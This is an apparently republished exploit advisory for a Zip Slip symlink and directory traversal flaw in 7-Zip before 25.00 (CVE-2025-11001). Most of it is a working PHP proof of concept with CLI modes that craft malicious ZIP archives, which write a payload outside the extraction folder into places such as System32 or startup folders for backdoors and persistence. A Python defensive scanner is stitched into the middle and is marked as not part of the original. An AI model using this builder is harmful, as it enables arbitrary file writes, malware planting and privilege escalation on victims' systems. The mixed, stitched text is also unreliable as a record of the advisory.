7-Zip 25.00 Zip Slip Directory Traversal

Published: 26 Nov 2025 00:00:00 | Reported by: indoushka | Type: packetstorm | Source: packetstorm.news

7-Zip before 25.00 has Zip Slip with traversal and symlink, null-byte truncation enabling writes.

=============================================================================================================================================
    | # Title     : 7-Zip 25.00 Zip Slip Symlink Directory Traversal Vulnerability                                                              |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.7-zip.org/                                                                                                      |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/211932/ & CVE-2025-11001 
    
    [+] Summary :
    
    Multiple archive extraction implementations, including 7-Zip versions prior to 25.00 and several ZIP libraries, improperly sanitize file paths during extraction.
    An attacker can craft a malicious ZIP archive containing:
    
    Directory traversal sequences (../../../)
    
    Symlink entries
    
    Manipulated extra fields
    
    Null-byte terminated link targets
    
    This allows files to be extracted outside the intended extraction folder and written to arbitrary locations on the victim system.
    
    [+] Vulnerability Class :
    
    Directory Traversal
    
    Arbitrary File Write
    
    Symlink Path Injection
    
    Null-byte truncation bug
    
    [+] Affected Software :
    
    7-Zip < 25.00 (Administrator-only exploitation on Windows)
    
    Any ZIP extraction tool vulnerable to Zip Slip (Java, PHP, Python, WinRAR variants...)
    
    Applications that use ZipArchive without proper sanitization
    
    [+] Impact
    
    A malicious ZIP archive allows an attacker to place files in arbitrary locations such as
    
    C:\Windows\System32\
    C:\ProgramData\Microsoft\Windows\Start Menu\
    /etc/
    /var/www/html/
    
    
    [+] Possible consequences:
    
        Backdoor planting
    
        Privilege escalation
    
        Persistence via startup folders
    
        Overwriting sensitive files
    
        Gaining remote execution depending on file location created
    
    [+] Technical Details
    
    [+] Core Exploit Mechanism
    
    The attacker inserts filenames such as : ../../../../Windows/System32/evil.exe
    
    or a symlink entry:  evil.lnk  ->  ../../../../Users/Public/Documents\0
    
    These paths bypass validators in 7-Zip and other ZIP extractors when running with elevated privileges.
    
    [+] PoC :
    
    <?php
    /*
    ===========================================================
       By Indoushka (Nekaa Salah eddine)
    ===========================================================
    */
    
    /* ===========================================================
       MODE 1 - Basic Zip Slip Exploit
       (Former: build_zip duplicated 4 times)
    =========================================================== */
    function poc_zip_slip($target_path, $payload_file, $output_zip)
    {
        if (!file_exists($payload_file)) { die("[-] Payload not found\n"); }
    
        $payload_name = basename($payload_file);
        $payload_data = file_get_contents($payload_file);
    
        $target = trim(str_replace("\\", "/", $target_path), "/") . "/";
        $traversal = "../../../../" . $target;
    
        $zip = new ZipArchive();
        if ($zip->open($output_zip, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== TRUE) {
            die("[-] Failed to create ZIP\n");
        }
    
        $zip->addFromString($traversal . $payload_name, $payload_data);
        $zip->close();
    
        echo "[+] PoC: Zip Slip ZIP created: $output_zip\n";
    }
    
    
    /* ===========================================================
       MODE 2 - Manual Symlink ZIP Creator
    =========================================================== */
    function poc_symlink_zip($target_path, $output_zip)
    {
        $target = trim(str_replace("\\", "/", $target_path), "/") . "/";
        $traversal = "../../../../" . $target;
    
        $name = "evil.lnk";
        $link = $traversal . "\x00";
    
        $extra  = pack("v", 0x756e);
        $extra .= pack("v", strlen($link));
        $extra .= $link;
    
        $local = pack("VvvvvvVVVvv",
            0x04034b50, 20, 0x800, 0x800, 0,0,0,0,0,
            strlen($name), strlen($extra)
        );
    
        file_put_contents($output_zip, $local . $name . $extra);
    
        echo "[+] PoC: Symlink ZIP created: $output_zip\n";
    }
    
    
    /* ===========================================================
       MODE 3 - Full Manual ZIP Builder (Symlink + Payload)
    =========================================================== */
    function poc_manual_zip($target_path, $payload_file, $output_zip)
    {
        if (!file_exists($payload_file)) { die("[-] Missing payload\n"); }
    
        $payload_name  = basename($payload_file);
        $payload_data  = file_get_contents($payload_file);
    
        $target = trim(str_replace("\\", "/", $target_path), "/") . "/";
        $trav   = "../../../../" . $target;
    
        $ln_name   = "evil.lnk";
        $ln_target = $trav . "\x00";
        $ln_extra  = pack("v", 0x756e).pack("v",strlen($ln_target)).$ln_target;
    
        $f = fopen($output_zip, "wb");
        $off = 0;
    
        // Local: Symlink
        $h1 = pack("VvvvvvVVVvv",
            0x04034b50,20,0x800,0x800,0,0,0,0,0,strlen($ln_name),strlen($ln_extra)
        );
        fwrite($f, $h1.$ln_name.$ln_extra);
        $symlink_offset = $off;
        $off += strlen($h1)+strlen($ln_name)+strlen($ln_extra);
    
        // Local: Payload
        $h2 = pack("VvvvvvVVVvv",
            0x04034b50,20,0x800,0,0,0,0,strlen($payload_data),strlen($payload_data),
            strlen($payload_name),0
        );
        fwrite($f, $h2.$payload_name.$payload_data);
        $payload_offset = $off;
        $off += strlen($h2)+strlen($payload_name)+strlen($payload_data);
    
        // Central Directory
        $cd_start = $off;
    
        // CD: Symlink
        $cd1 = pack("VvvvvvVVVvvvvvVV",
            0x02014b50,0x0317,20,0x800,0,0,0,0,0,0,
            strlen($ln_name),strlen($ln_extra),0,0,0,(0777<<16)|0xA1ED,$symlink_offset
        );
        fwrite($f, $cd1.$ln_name.$ln_extra);
    
        // CD: Payload
        $cd2 = pack("VvvvvvVVVvvvvvVV",
            0x02014b50,0x0317,20,0x800,0,0,0,0,
            strlen($payload_data),strlen($payload_data),
            strlen($payload_name),0,0,0,0,(0777<<16),$payload_offset
        );
        fwrite($f, $cd2.$payload_name);
    
        // EOCD
        $eocd = pack("VvvvvVVv",
            0x06054b50,0,0,2,2,$off,$cd_start,0
        );
        fwrite($f, $eocd);
        fclose($f);
    
        echo "[+] PoC: Manual ZIP generated: $output_zip\n";
    }
    
    
    /* ===========================================================
       MODE 4 - CVE-2025-11001 (7-Zip Directory Traversal)
    =========================================================== */
    function poc_cve_2025_11001($target, $payload, $output)
    {
        poc_manual_zip($target, $payload, $output);
    
        echo "[+] CVE-2025-11001 Archive Ready\n";
    }
    
    
    /* ===========================================================
       CLI Controller
    =========================================================== */
    
    if (php_sapi_name() == "cli")
    {
        $args = getopt("", [
            "mode:",
            "target:",
            "payload::",
            "output::"
        ]);
    
        if (!isset($args["mode"])) {
            die("Usage:\n
    php exploit.php --mode=zip-slip     --target=DIR --payload=file --output=out.zip
    php exploit.php --mode=symlink      --target=DIR --output=out.zip
    php exploit.php --mode=manual       --target=DIR --payload=file --output=out.zip
    php exploit.php --mode=cve-2025-11001 --target=DIR --payload=file --output=exp.zip
    ");
        }
    
        $mode   = $args["mode"];
        $target = $args["target"] ?? null;
        $payload= $args["payload"] ?? null;
        $output = $args["output"] ?? "exploit.zip";
    
        switch ($mode) {
            case "zip-slip":
                poc_zip_slip($target, $payload, $output);
                break;
    
            case "symlink":
                poc_symlink_zip($target, $output);
                break;
    
            case "manual":
                poc_manual_zip($target, $payload, $output);
                break;
    
            case "cve-2025-11001":
                poc_cve_2025_11001($target, $payload, $output);
                break;
    
            default:
                echo "Unknown mode.\n";
        }
    }
    ?>
    
    
    Save as : poc.php
    
    run : php poc.php
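A defensive counterpart, added here and not part of the original advisory: a Python scanner that inspects an archive's central directory before anything is extracted and flags the three patterns described above (traversal in entry names, symlink entries whose target contains a NUL byte, and link targets carried in the 0x756e extra field the PoC packs). The archive it scans is constructed in memory for illustration; only the extra-field id 0x756e is taken from the PoC.

```python
import posixpath, struct, zipfile
from io import BytesIO

S_IFMT, S_IFLNK = 0o170000, 0o120000  # Unix mode lives in the high 16 bits of external_attr
UNIX_EXTRA_ID = 0x756E                # extra-field id the PoC above packs a link target into

def _extra_fields(extra: bytes):
    """Walk the (id, size, data) records of a ZIP extra-field blob."""
    off = 0
    while off + 4 <= len(extra):
        fid, size = struct.unpack_from("<HH", extra, off)
        yield fid, extra[off + 4:off + 4 + size]
        off += 4 + size

def _escapes_root(path: str) -> bool:
    """True if a (possibly backslash-separated) path would land outside the extraction root."""
    p = posixpath.normpath(path.replace("\\", "/"))
    return p.startswith("/") or p == ".." or p.startswith("../") or (len(p) > 1 and p[1] == ":")

def entry_findings(zi: zipfile.ZipInfo, body: bytes) -> list:
    """Reasons an entry must not be extracted as-is; an empty list means the entry looks clean."""
    findings = []
    if _escapes_root(zi.filename):
        findings.append("entry name escapes extraction root")
    targets = [body] if ((zi.external_attr >> 16) & S_IFMT) == S_IFLNK else []  # symlink body = target
    targets += [data for fid, data in _extra_fields(zi.extra) if fid == UNIX_EXTRA_ID]
    for raw in targets:
        if b"\x00" in raw:
            findings.append("NUL byte in link target (truncation trick)")
        if _escapes_root(raw.split(b"\x00", 1)[0].decode("utf-8", "replace")):
            findings.append("link target escapes extraction root")
    return findings

def scan_zip(zip_bytes: bytes) -> dict:
    """Map every central-directory entry of the archive to its findings, without extracting anything."""
    with zipfile.ZipFile(BytesIO(zip_bytes)) as zf:
        return {zi.filename: entry_findings(zi, zf.read(zi)) for zi in zf.infolist()}

def build_sample() -> bytes:
    """Constructed in-memory archive: one clean entry plus the patterns the advisory describes."""
    buf = BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", b"hello")
        zf.writestr("../../../../Windows/System32/evil.exe", b"MZ")  # traversal in the entry name
        ln = zipfile.ZipInfo("evil.lnk")
        ln.external_attr = (S_IFLNK | 0o777) << 16                       # mark the entry as a symlink
        ln.extra = struct.pack("<HH", UNIX_EXTRA_ID, 5) + b"../x\x00"    # target smuggled in extra field
        zf.writestr(ln, b"../../../../Users/Public/Documents\x00")        # NUL-terminated link target
    return buf.getvalue()
```

Any entry with a non-empty findings list should be refused (or the whole archive rejected), since extractors that stop validating at the first NUL byte see only the clean-looking prefix.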
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Vulners AI Score: 7 (High risk) | CVSS 3.1: 7.8 | CVSS 3: 7 | EPSS: 0.00258